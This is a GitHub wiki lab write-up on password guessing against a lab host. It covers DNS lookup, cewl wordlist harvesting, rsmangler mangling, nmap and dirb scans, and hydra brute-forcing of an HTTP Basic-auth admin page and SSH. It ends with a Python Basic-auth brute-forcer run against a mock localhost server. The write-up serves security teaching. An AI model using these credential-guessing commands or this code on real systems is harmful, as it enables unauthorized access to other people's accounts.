Lab 5.1: Password Guessing - squatchulator/Tech-Journal GitHub Wiki
Remember that trick of using a specific DNS server (the one on shire) to look up a hostname or reverse-lookup an IP address? The host we are interested in has the IP 10.0.5.21. Query the shire DNS server at 10.0.5.22 for the reverse record:
nslookup 10.0.5.21 10.0.5.22
This returns the hostname DNS actually provides for the system, which is also a hint for usernames later on.
- Pull a wordlist from each user's bio page on the Shire website and filter out unnecessary words by hand. The grep keeps only lines containing a capital letter (names, places and other proper nouns), which is where personal passwords usually come from:
cewl http://10.0.5.21/bios/<name> -d 1 | grep '[A-Z]' > <name>.small.txt
- Once you have your wordlists, it's time to mangle them (-x and -m set the maximum and minimum candidate length, so the list stays within a plausible password range):
rsmangler --file <name>.small.txt -x 12 -m 9 -l -s -e -i -p -u -a --output <name>.mangled.txt
- Now that the password lists are mangled, run a quick reconnaissance scan of TCP ports 1-1024 to see service versions (this is what tells you HTTP and SSH are the targets):
sudo nmap -sV -p T:1-1024 10.0.5.21
- See if you can find any more information with a quick dirb pass (dirb's -r disables recursion, so this only checks the top-level directories):
dirb http://10.0.5.21 -r
- There is a 10.0.5.21/admin page that returns a 401 Unauthorized with a WWW-Authenticate header, i.e. it is protected by HTTP Basic authentication and a wrong or missing password comes back as another 401.
- Now use hydra to guess the password for that admin page. -l is the single username, -P the mangled wordlist, -s 80 the port, and -f stops hydra as soon as one password works:
hydra -l <name> -P <name>.mangled.txt -s 80 -f 10.0.5.21 http-get /admin/
- You should have passwords for all admin users now. This time, run hydra against SSH on port 22 to find the SSH logins; the SSH usernames follow the firstname.lastname pattern rather than the short name used on the web page:
hydra -l <name.lastname> -P <name>.mangled.txt 10.0.5.21 ssh
- NOTE: this takes a long time because SSH handshakes are slow and the server limits attempts, so let it run in the background.
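To see what the mangle-then-guess steps above actually do on the wire, here is a small added example (my own code, not part of the lab or the Tech-Journal wiki). It applies a tiny rsmangler-style transform to a constructed "cewl" harvest and then does what `hydra http-get` does against the 401 page: one GET per candidate with a Basic Authorization header, stopping at the first non-401. Because the real 10.0.5.21 is not reachable here, it starts a mock /admin/ server on localhost; the seed words, the mock username `frodo`, the mock password `Baggins1` and the mangling rules are all assumptions, not values from the lab.

```python
"""Added example: what hydra http-get does under the hood against a Basic-auth
/admin/ page, fed by a miniature rsmangler.  The mock target, seed words and
credentials below are constructed for the demo and are not the lab's values."""
import base64
import http.server
import threading
import urllib.error
import urllib.request

# Constructed sample: a cewl harvest from a fictional bio page, already
# filtered to capitalised words the way the lab's grep '[A-Z]' does.
SEED_WORDS = ["Frodo", "Hobbit", "Baggins", "Shire"]

# Assumed credentials for the mock /admin/ page (not from the lab).
MOCK_USER = "frodo"
MOCK_PASS = "Baggins1"


def mangle(words, min_len=6, max_len=12):
    """Tiny subset of rsmangler: case variants plus common suffixes, bounded
    by -m/-x style minimum and maximum lengths.  Order is preserved and
    duplicates dropped so the candidate list is deterministic."""
    out = []
    for w in words:
        for base in (w.lower(), w.capitalize(), w.upper()):
            for suffix in ("", "1", "123", "!"):
                cand = base + suffix
                if min_len <= len(cand) <= max_len and cand not in out:
                    out.append(cand)
    return out


class _AdminHandler(http.server.BaseHTTPRequestHandler):
    """Mock of the lab's /admin/ page: 401 with a Basic challenge unless the
    Authorization header decodes to MOCK_USER:MOCK_PASS."""

    def do_GET(self):
        expected = base64.b64encode(f"{MOCK_USER}:{MOCK_PASS}".encode()).decode()
        if self.headers.get("Authorization") == f"Basic {expected}":
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"admin area\n")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="admin"')
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock_server():
    """Bind the mock on an ephemeral localhost port; returns (server, admin_url)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _AdminHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/admin/"


def guess_basic_auth(url, user, wordlist):
    """Equivalent of `hydra -l user -P list -f ... http-get /admin/`: send one
    GET per candidate with a Basic header and stop at the first 200.
    Returns (password, attempts) or (None, attempts) if nothing worked."""
    for attempt, pw in enumerate(wordlist, 1):
        token = base64.b64encode(f"{user}:{pw}".encode()).decode()
        req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                if resp.status == 200:
                    return pw, attempt
        except urllib.error.HTTPError as e:
            if e.code != 401:  # anything other than "wrong creds" deserves a look
                raise
    return None, len(wordlist)


if __name__ == "__main__":
    srv, url = start_mock_server()
    try:
        pw, tries = guess_basic_auth(url, MOCK_USER, mangle(SEED_WORDS))
        print(f"found {pw!r} after {tries} attempts" if pw else "no hit")
    finally:
        srv.shutdown()
```

The important check is in `guess_basic_auth`: a 401 is the expected "wrong password" answer and is silently skipped, but any other error (403 from a lockout, 429 from rate limiting, a connection reset) is raised instead of being counted as a miss, which is the same reason to watch hydra's output rather than just its final line.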